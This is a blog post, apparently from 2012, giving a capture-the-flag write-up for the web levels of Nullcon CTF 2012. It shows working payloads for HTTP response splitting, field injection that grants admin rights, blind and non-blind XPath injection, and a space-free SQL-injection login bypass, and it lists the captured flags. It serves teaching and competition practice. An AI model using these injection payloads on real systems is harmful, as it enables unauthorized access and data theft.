Mittwoch, 18. Januar 2012

Nullcon Ctf 2012 Web Writeup

Level 1


adding a will trigger a 503 error

The server just emulated the bug, so you had to guess the right solution string.

Solution:
/challenge/wlevel-1-proc.asp?input=password.asptest.txt

Level 2


Can you redirect ME to hackim.null.co.in?

First idea was trying http response splitting, but you won't get real feedback. I guess it's emulated again. At the end the following request did it.

GET /challenge/wlevel-2-proc.asp?page=%0d%0a%0aHTTP/1.1%20302%20Moved%20Temporarily%0d%0aLocation:%20http://hackim.null.co.in/

Level 3


Login System

Click here to Login
Click here to Register
Invalid Flag. Please try again.



Registration using
username=Admin125&name=admin&password=admin&email=admin%40somemail.com&Submit=Register
and we get
Debug Info: INSERT 'Admin125|admin|admin|admin@somemail.com|admin:no|comment:new user' INTO USER DB FILE

changing to:
username=Admin126&name=admin&password=admin&email=admin%40somemail.com|admin:yes&Submit=Register

Login as Admin126 and you get

Welcome! You are logged in as ADMIN!
Flag: b3149ecea4628efd23d2f86e5a723472


Level 4

Can You Get Me all the Data?

2007
2002

Check for XPATH injection
/challenge/wlevel-4-data.asp?input='%20or%20''='
We get 11 presidents of india

trying flag as node name and identify lenght of the flag
/challenge/wlevel-4-data.asp?input='%20orstring-length(//flag)=11%20and%20''='

bruteforce using
/challenge/wlevel-4-data.asp?input='%20or%20substring(//flag,1,1)='W'%20and%20''='

We get "Web+Level+4", but this is not the solution.

So trying to get all data.
Doing some experiments and get the count of all entries.
/challenge/wlevel-4-data.asp?input=2002'%20and%20count(/*[1]/*[1]/*)=12%20and%20''='

11 presidents but 12 nodes?

Either you guess the node name or you bruteforce the server with blind XPATH attacks like me.

After searching for the node //value

Flag: myworthinessisallmydoubthismeritallmyfearcontrastingwhichmyqualitydoeshoweverappear


Afterwards i got non blind solutions from others

1: '] //* | //* ['1' ='1
2: 2002']/parent::node()[position()='1

Web Level 5


Do You Have What IT Takes to Break into the World's Most Secure Login System?

SQL injection with recaptcha?

If you insert ' OR ''=' you will be detected, so no spaces are allowed.

You can try '=' which should build a query like "where username=''=''" and this will be true.

In our case inserting '!=' or '<>' in username and password will pass the test.

username = '' != '' and password = '' != ''

Why is this working? The query is executed here from left to right.
username = '' is FALSE
FALSE != '' is TRUE

For SQLite: "Arithmetic, boolean, relational and bitwise operators are all left to right associated."

Flag: 47c1b025fa18ea96c33fbb6718688c0f




For corrections and other feedback send me an e-mail to bashrc at intruded dot net

Keine Kommentare:

Kommentar veröffentlichen